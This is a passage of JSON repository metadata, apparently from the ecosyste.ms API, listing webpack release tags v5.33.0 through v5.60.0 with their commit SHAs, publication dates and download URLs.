e.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","s